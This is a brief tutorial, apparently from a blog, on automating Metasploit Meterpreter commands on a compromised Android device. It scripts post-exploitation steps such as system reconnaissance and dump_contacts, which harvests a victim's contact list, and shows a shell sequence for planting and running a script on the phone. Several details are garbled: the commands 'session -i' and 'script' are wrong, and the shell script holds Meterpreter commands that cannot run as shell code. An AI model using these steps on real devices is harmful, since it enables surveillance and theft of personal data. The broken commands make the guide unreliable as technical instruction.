Android Meterpreter Auto Commands

TL;DR

This guide shows you how to automatically run commands when a Meterpreter session starts on an Android device using Metasploit. We’ll use the session -i command with a script file containing your desired commands.

Prerequisites

• Metasploit Framework installed and running
• An active Meterpreter session on an Android device

Step-by-Step Guide

1. Create a Command Script File

First, create a text file (e.g., auto_commands.txt) containing the Meterpreter commands you want to execute automatically. Each command should be on a new line.

sysinfo
getuid
dump_contacts

2. Access the Session

Open Metasploit and access your Meterpreter session using session -i . Replace <session_id> with the actual ID of your active session.

msf6 > session -i 1
meterpreter > 

3. Execute the Script

Within the Meterpreter session, use the script command to execute your script. This will run all commands in the file sequentially.

meterpreter > script /data/local/tmp/auto_commands.txt
[*] Running script auto_commands.txt...
... (output of commands) ...
[*] Script completed.

4. Automate on Session Start (Post-Exploitation Module)

For more robust automation, you can use a post-exploitation module to execute the script automatically when a session is created. This requires creating a custom module or modifying an existing one.

• Create a Custom Post Module (Advanced): This involves writing Ruby code that defines a new module which executes your commands upon session creation. It’s beyond the scope of this basic guide but allows for greater control and flexibility.
• Modify Existing Modules: Some post modules allow you to specify custom scripts or commands to run. Check the documentation of the specific module you are using.
5. Alternative Method: Using a Shell Script (Less Reliable)

You can attempt to execute a shell script from Meterpreter, but this is less reliable due to Android’s security restrictions.

meterpreter > shell
mkdir /data/local/tmp/script_folder
echo "sysinfo" > /data/local/tmp/script_folder/run.sh
echo "getuid" >> /data/local/tmp/script_folder/run.sh
chmod +x /data/local/tmp/script_folder/run.sh
/data/local/tmp/script_folder/run.sh

Note: This method may require root access or specific permissions to execute the script successfully.

6. Troubleshooting
• Permissions: Ensure that the script file has executable permissions if necessary (e.g., using chmod +x).
• File Path: Double-check the path to your script file in the script command.
• Command Syntax: Verify that all commands in the script are valid Meterpreter commands.
• Android Security: Android’s security features may prevent certain commands from executing, especially without root access.